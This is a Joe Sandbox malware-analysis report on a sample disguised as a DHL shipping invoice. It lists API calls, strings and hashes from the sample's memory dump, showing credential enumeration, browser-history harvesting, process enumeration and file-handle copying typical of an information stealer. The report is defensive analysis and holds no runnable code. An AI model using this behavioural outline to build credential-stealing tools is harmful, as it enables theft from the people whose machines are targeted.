                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                                      • String ID: bhv
                                                                                                                                                                                                                                      • API String ID: 4234240956-2689659898
                                                                                                                                                                                                                                      • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                      • API String ID: 2941347001-70141382
                                                                                                                                                                                                                                      • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                                                                      • String ID: visited:
                                                                                                                                                                                                                                      • API String ID: 2470578098-1702587658
                                                                                                                                                                                                                                      • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                                                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                                      • API String ID: 2804212203-2982631422
                                                                                                                                                                                                                                      • Opcode ID: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                                                                                                                                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 770 40bdb0-40bdce call 404363 773 40bf63-40bf6f call 40440c 770->773 774 40bdd4-40bddd 770->774 776 40bdee 774->776 777 40bddf-40bdec CredEnumerateW 774->777 779 40bdf0-40bdf2 776->779 777->779 779->773 780 40bdf8-40be18 call 40b2cc wcslen 779->780 783 40bf5d-40bf60 LocalFree 780->783 784 40be1e-40be20 780->784 783->773 784->783 785 40be26-40be42 wcsncmp 784->785 786 40be48-40be77 call 40bd5d call 404423 785->786 787 40bf4e-40bf57 785->787 786->787 792 40be7d-40bea3 memset 786->792 787->783 787->784 793 40bea5 792->793 794 40bea7-40beea memcpy 792->794 793->794 795 40bf11-40bf2d wcschr 794->795 796 40beec-40bf06 call 40b2cc _wcsnicmp 794->796 798 40bf38-40bf48 LocalFree 795->798 799 40bf2f-40bf35 795->799 796->795 802 40bf08-40bf0e 796->802 798->787 799->798 802->795
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                      • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                                      • LocalFree.KERNELBASE(?,00000214,?,00000000,?), ref: 0040BF60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$FreeLocal$CredEnumerate_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1564206659-0
                                                                                                                                                                                                                                      • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                                                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 115830560-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                                                                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 855 41837f-4183bf 856 4183c1-4183cc call 418197 855->856 857 4183dc-4183ec call 418160 855->857 864 4183d2-4183d8 856->864 865 418517-41851d 856->865 862 4183f6-41840b 857->862 863 4183ee-4183f1 857->863 866 418417-418423 862->866 867 41840d-418415 862->867 863->865 864->857 868 418427-418442 call 41739b 866->868 867->868 871 418444-41845d CreateFileW 868->871 872 41845f-418475 CreateFileA 868->872 873 418477-41847c 871->873 872->873 874 4184c2-4184c7 873->874 875 41847e-418495 GetLastError free 873->875 876 4184d5-418501 memset call 418758 874->876 877 4184c9-4184d3 874->877 878 4184b5-4184c0 call 444706 875->878 879 418497-4184b3 call 41837f 875->879 884 418506-418515 free 876->884 877->876 878->865 879->865 884->865
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                                                                      • String ID: |A
                                                                                                                                                                                                                                      • API String ID: 77810686-1717621600
                                                                                                                                                                                                                                      • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                                                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                                      • API String ID: 2791114272-628097481
                                                                                                                                                                                                                                      • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
